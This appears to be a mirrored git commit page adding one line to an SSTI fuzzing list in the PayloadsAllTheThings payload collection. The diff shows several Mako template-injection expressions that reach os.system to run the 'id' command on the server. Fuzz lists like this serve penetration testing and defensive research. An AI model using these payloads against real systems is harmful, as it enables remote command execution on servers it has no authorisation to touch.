mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Update ssti.fuzz
This commit is contained in:
parent
b389464212
commit
d43c041983
1 changed files with 1 additions and 0 deletions
|
@ -76,3 +76,4 @@ ${self.context._with_template.module.runtime.util.os.system("id")}
|
|||
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
||||
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
||||
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue